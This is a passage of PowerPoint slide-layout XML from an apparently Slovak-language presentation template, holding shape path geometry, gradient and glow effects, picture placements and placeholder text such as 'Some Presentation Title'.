              <a:gd name="connsiteX24" fmla="*/ 1048103 w 6691457"/>
              <a:gd name="connsiteY24" fmla="*/ 5030050 h 5065475"/>
              <a:gd name="connsiteX25" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY25" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX26" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY26" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX27" fmla="*/ 1048864 w 6691457"/>
              <a:gd name="connsiteY27" fmla="*/ 5030240 h 5065475"/>
              <a:gd name="connsiteX28" fmla="*/ 1983490 w 6691457"/>
              <a:gd name="connsiteY28" fmla="*/ 4857648 h 5065475"/>
              <a:gd name="connsiteX29" fmla="*/ 2085074 w 6691457"/>
              <a:gd name="connsiteY29" fmla="*/ 4798974 h 5065475"/>
              <a:gd name="connsiteX30" fmla="*/ 5937633 w 6691457"/>
              <a:gd name="connsiteY30" fmla="*/ 2573648 h 5065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691457" h="5065475">
                <a:moveTo>
                  <a:pt x="5937728" y="2573648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6039311" y="2514974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6288463" y="2366669"/>
                  <a:pt x="6555893" y="2165406"/>
                  <a:pt x="6656049" y="1791550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6656049" y="1791455"/>
                  <a:pt x="6656049" y="1791264"/>
                  <a:pt x="6656144" y="1791169"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6656144" y="1791169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6656144" y="1791169"/>
                  <a:pt x="6656144" y="1790883"/>
                  <a:pt x="6656239" y="1790788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6756394" y="1416836"/>
                  <a:pt x="6625298" y="1108798"/>
                  <a:pt x="6483728" y="855719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6425082" y="754087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6425082" y="754087"/>
                  <a:pt x="6366436" y="652455"/>
                  <a:pt x="6366436" y="652455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6218202" y="403186"/>
                  <a:pt x="6017034" y="135629"/>
                  <a:pt x="5643355" y="35426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5643259" y="35426"/>
                  <a:pt x="5643069" y="35426"/>
                  <a:pt x="5642974" y="35330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5642974" y="35330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5642974" y="35330"/>
                  <a:pt x="5642688" y="35330"/>
                  <a:pt x="5642593" y="35235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5268819" y="-64968"/>
                  <a:pt x="4960927" y="66191"/>
                  <a:pt x="4707967" y="207828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4606384" y="266502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753729" y="2491828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652146" y="2550502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="402995" y="2698806"/>
                  <a:pt x="135564" y="2900070"/>
                  <a:pt x="35409" y="3273926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35409" y="3274021"/>
                  <a:pt x="35409" y="3274212"/>
                  <a:pt x="35314" y="3274307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35314" y="3274307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35314" y="3274307"/>
                  <a:pt x="35314" y="3274592"/>
                  <a:pt x="35218" y="3274688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-64937" y="3648639"/>
                  <a:pt x="66160" y="3956678"/>
                  <a:pt x="207730" y="4209757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207730" y="4209757"/>
                  <a:pt x="266376" y="4311389"/>
                  <a:pt x="266376" y="4311389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="325022" y="4413021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="473256" y="4662290"/>
                  <a:pt x="674424" y="4929847"/>
                  <a:pt x="1048103" y="5030050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1048198" y="5030050"/>
                  <a:pt x="1048388" y="5030050"/>
                  <a:pt x="1048483" y="5030145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048483" y="5030145"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048483" y="5030145"/>
                  <a:pt x="1048769" y="5030145"/>
                  <a:pt x="1048864" y="5030240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422638" y="5130444"/>
                  <a:pt x="1730531" y="4999284"/>
                  <a:pt x="1983490" y="4857648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2085074" y="4798974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937633" y="2573648"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="19000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="76000">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="87CFD3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="1168400">
              <a:schemeClr val="accent1">
                <a:alpha val="7000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="1270000" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:alpha val="54000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11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0110DDC5-979D-E03C-7BA4-AD46859404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7454" y="2211861"/>
            <a:ext cx="5795492" cy="2704706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12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CBE9E68-AB81-891D-ED2B-A8D0E73ECF0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16485" y="4016209"/>
            <a:ext cx="10391614" cy="2607014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 1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0FF13757-7702-330B-70C1-53AFB8F51C3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6815" y="866505"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 1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BB69001A-8748-AC27-0FB4-4D0E1FF6FAB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7826" y="4877898"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15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0A4C3AF3-2461-1E3A-7766-B3B3A8A8949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alphaModFix amt="50000"/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Blur radius="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27584" y="8159547"/>
            <a:ext cx="5795492" cy="847754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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626E58E5-B601-44FB-3D7C-F245FE85A47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205646" y="1229464"/>
            <a:ext cx="3120056" cy="618632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BF281B37-560D-B024-7CBE-EBD57B2B706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295401" y="8697179"/>
            <a:ext cx="2325914" cy="310122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Zástupný objekt pre text 6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1295401" y="7680226"/>
            <a:ext cx="10304418" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Zástupný objekt pre text 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1295401" y="8093867"/>
            <a:ext cx="10304418" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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 userDrawn="1">
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4079729"/>
            <a:ext cx="10291356" cy="2409250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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1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Some Presentation Title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17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5338AF3E-1F0A-23DD-FF25-D821FE2BDFE5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41592" y="4684094"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18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B3A039A7-4100-9B91-8117-E47DC103C73F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artisticBlur radius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0328" y="4750076"/>
            <a:ext cx="5795492" cy="698916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19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17D950D4-48CB-DD7E-877C-092F4201E24F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3426" y="-1681724"/>
            <a:ext cx="13591424" cy="340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147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hape - 2">
    <p:bg bwMode="ltGray"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!!SHAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69981505-D3DA-5160-7E94-4195B44B7B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11124389" y="-7624838"/>
            <a:ext cx="33733770" cy="25536676"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5937728 w 6691457"/>
              <a:gd name="connsiteY0" fmla="*/ 2573648 h 5065475"/>
              <a:gd name="connsiteX1" fmla="*/ 6039311 w 6691457"/>
              <a:gd name="connsiteY1" fmla="*/ 2514974 h 5065475"/>
              <a:gd name="connsiteX2" fmla="*/ 6656049 w 6691457"/>
              <a:gd name="connsiteY2" fmla="*/ 1791550 h 5065475"/>
              <a:gd name="connsiteX3" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY3" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX4" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY4" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX5" fmla="*/ 6656239 w 6691457"/>
              <a:gd name="connsiteY5" fmla="*/ 1790788 h 5065475"/>
              <a:gd name="connsiteX6" fmla="*/ 6483728 w 6691457"/>
              <a:gd name="connsiteY6" fmla="*/ 855719 h 5065475"/>
              <a:gd name="connsiteX7" fmla="*/ 6425082 w 6691457"/>
              <a:gd name="connsiteY7" fmla="*/ 754087 h 5065475"/>
              <a:gd name="connsiteX8" fmla="*/ 6366436 w 6691457"/>
              <a:gd name="connsiteY8" fmla="*/ 652455 h 5065475"/>
              <a:gd name="connsiteX9" fmla="*/ 5643355 w 6691457"/>
              <a:gd name="connsiteY9" fmla="*/ 35426 h 5065475"/>
              <a:gd name="connsiteX10" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY10" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX11" fmla="*/ 5642974 w 6691457"/>
              <a:gd name="connsiteY11" fmla="*/ 35330 h 5065475"/>
              <a:gd name="connsiteX12" fmla="*/ 5642593 w 6691457"/>
              <a:gd name="connsiteY12" fmla="*/ 35235 h 5065475"/>
              <a:gd name="connsiteX13" fmla="*/ 4707967 w 6691457"/>
              <a:gd name="connsiteY13" fmla="*/ 207828 h 5065475"/>
              <a:gd name="connsiteX14" fmla="*/ 4606384 w 6691457"/>
              <a:gd name="connsiteY14" fmla="*/ 266502 h 5065475"/>
              <a:gd name="connsiteX15" fmla="*/ 753729 w 6691457"/>
              <a:gd name="connsiteY15" fmla="*/ 2491828 h 5065475"/>
              <a:gd name="connsiteX16" fmla="*/ 652146 w 6691457"/>
              <a:gd name="connsiteY16" fmla="*/ 2550502 h 5065475"/>
              <a:gd name="connsiteX17" fmla="*/ 35409 w 6691457"/>
              <a:gd name="connsiteY17" fmla="*/ 3273926 h 5065475"/>
              <a:gd name="connsiteX18" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY18" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX19" fmla="*/ 35314 w 6691457"/>
              <a:gd name="connsiteY19" fmla="*/ 3274307 h 5065475"/>
              <a:gd name="connsiteX20" fmla="*/ 35218 w 6691457"/>
              <a:gd name="connsiteY20" fmla="*/ 3274688 h 5065475"/>
              <a:gd name="connsiteX21" fmla="*/ 207730 w 6691457"/>
              <a:gd name="connsiteY21" fmla="*/ 4209757 h 5065475"/>
              <a:gd name="connsiteX22" fmla="*/ 266376 w 6691457"/>
              <a:gd name="connsiteY22" fmla="*/ 4311389 h 5065475"/>
              <a:gd name="connsiteX23" fmla="*/ 325022 w 6691457"/>
              <a:gd name="connsiteY23" fmla="*/ 4413021 h 5065475"/>
              <a:gd name="connsiteX24" fmla="*/ 1048103 w 6691457"/>
              <a:gd name="connsiteY24" fmla="*/ 5030050 h 5065475"/>
              <a:gd name="connsiteX25" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY25" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX26" fmla="*/ 1048483 w 6691457"/>
              <a:gd name="connsiteY26" fmla="*/ 5030145 h 5065475"/>
              <a:gd name="connsiteX27" fmla="*/ 1048864 w 6691457"/>
              <a:gd name="connsiteY27" fmla="*/ 5030240 h 5065475"/>
              <a:gd name="connsiteX28" fmla="*/ 1983490 w 6691457"/>
              <a:gd name="connsiteY28" fmla="*/ 4857648 h 5065475"/>
              <a:gd name="connsiteX29" fmla="*/ 2085074 w 6691457"/>
              <a:gd name="connsiteY29" fmla="*/ 4798974 h 5065475"/>
              <a:gd name="connsiteX30" fmla="*/ 5937633 w 6691457"/>
              <a:gd name="connsiteY30" fmla="*/ 2573648 h 5065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691457" h="5065475">
                <a:moveTo>
                  <a:pt x="5937728" y="2573648"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6039311" y="2514974"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6288463" y="2366669"/>
                  <a:pt x="6555893" y="2165406"/>
                  <a:pt x="6656049" y="1791550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6656049" y="1791455"/>
                  <a:pt x="6656049" y="1791264"/>
                  <a:pt x="6656144" y="1791169"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6656144" y="1791169"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6656144" y="1791169"/>
                  <a:pt x="6656144" y="1790883"/>
                  <a:pt x="6656239" y="1790788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6756394" y="1416836"/>
                  <a:pt x="6625298" y="1108798"/>
                  <a:pt x="6483728" y="855719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6425082" y="754087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6425082" y="754087"/>
                  <a:pt x="6366436" y="652455"/>
                  <a:pt x="6366436" y="652455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6218202" y="403186"/>
                  <a:pt x="6017034" y="135629"/>
                  <a:pt x="5643355" y="35426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5643259" y="35426"/>
                  <a:pt x="5643069" y="35426"/>
                  <a:pt x="5642974" y="35330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5642974" y="35330"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5642974" y="35330"/>
                  <a:pt x="5642688" y="35330"/>
                  <a:pt x="5642593" y="35235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5268819" y="-64968"/>
                  <a:pt x="4960927" y="66191"/>
                  <a:pt x="4707967" y="207828"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4606384" y="266502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="753729" y="2491828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652146" y="2550502"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="402995" y="2698806"/>
                  <a:pt x="135564" y="2900070"/>
                  <a:pt x="35409" y="3273926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35409" y="3274021"/>
                  <a:pt x="35409" y="3274212"/>
                  <a:pt x="35314" y="3274307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35314" y="3274307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="35314" y="3274307"/>
                  <a:pt x="35314" y="3274592"/>
                  <a:pt x="35218" y="3274688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-64937" y="3648639"/>
                  <a:pt x="66160" y="3956678"/>
                  <a:pt x="207730" y="4209757"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207730" y="4209757"/>
                  <a:pt x="266376" y="4311389"/>
                  <a:pt x="266376" y="4311389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="325022" y="4413021"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="473256" y="4662290"/>
                  <a:pt x="674424" y="4929847"/>
                  <a:pt x="1048103" y="5030050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1048198" y="5030050"/>
                  <a:pt x="1048388" y="5030050"/>
                  <a:pt x="1048483" y="5030145"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048483" y="5030145"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048483" y="5030145"/>
                  <a:pt x="1048769" y="5030145"/>
                  <a:pt x="1048864" y="5030240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422638" y="5130444"/>
                  <a:pt x="1730531" y="4999284"/>
                  <a:pt x="1983490" y="4857648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2085074" y="4798974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937633" y="2573648"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="19000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
                <a:gs pos="76000">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:srgbClr val="87CFD3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="18900000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="1168400">
              <a:schemeClr val="accent1">
                <a:alpha val="7000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="1270000" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:alpha val="54000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F58DE5-EF1C-988C-6FA5-5A4C78318066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7577642" y="-5530158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1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626E58E5-B601-44FB-3D7C-F245FE85A4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05646" y="1229464"/>
            <a:ext cx="3120056" cy="61863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2B416A4-E9EA-C99B-F28C-510B70124CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873198" y="7308130"/>
            <a:ext cx="0" cy="934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CF7C6-90C3-D7FE-11D5-7A1C80200205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301198" y="7287022"/>
            <a:ext cx="0" cy="934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!!LIGHT-CRIMSON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B29C632-EB78-1DE8-2BFF-7E1523FA0C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6650601" y="-12612233"/>
            <a:ext cx="39337158" cy="39337158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69000">
                <a:schemeClr val="accent4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9" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A503E7DF-2A15-C59D-C04D-2E32F27FD5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98392" y="7323860"/>
            <a:ext cx="4087760" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F83492DB-143C-65E1-6C04-1EFD5014353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98392" y="7730371"/>
            <a:ext cx="4087760" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Nadpis 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECD86F44-B30E-3461-C643-45DF430631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95400" y="4079729"/>
            <a:ext cx="10291356" cy="2409250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>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1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Some Presentation Title</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0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D81CA075-CEA6-BEAB-A1D2-ACED11F9CE1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95401" y="8697179"/>
            <a:ext cx="2325914" cy="310122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087CD0CB-8B7D-F989-9AA3-E4B88B96C2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2280" y="7323860"/>
            <a:ext cx="4087760" cy="332399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2400" b="0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</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1739339F-B97F-DFC9-AD5D-03756E3502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2280" y="7730371"/>
            <a:ext cx="4087760" cy="195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400" b="0" i="0" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="50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611849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lobe - 2">
    <p:bg bwMode="ltGray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Rectangle 687">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E49B2F8D-289C-712F-4D14-56E33F7792AD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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="globe">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F53070-CF97-ACD0-17D5-8A577C0C06C2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67463" y="-262342"/>
            <a:ext cx="23842134" cy="13411200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F58DE5-EF1C-988C-6FA5-5A4C78318066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434649" y="293719"/>
            <a:ext cx="12282910" cy="12282910"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="55000">
                <a:schemeClr val="accent1">
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100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691" name="Picture 690">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C6722F-ADC9-4044-3C6A-C2767D61CBF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9020" y="-785559"/>
            <a:ext cx="24981900" cy="14052318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C85C96-9889-D2C3-0F17-02489DDCBB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19149994" y="-17982778"/>
            <a:ext cx="35440872" cy="35440872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61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690" name="!!LIGHT-CRIMSON">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49532EA-3484-EF42-C258-198BA2B4422A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783345" y="-19013719"/>
            <a:ext cx="39337158" cy="39337158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69000">
                <a:schemeClr val="accent4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0" name="!!SHAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
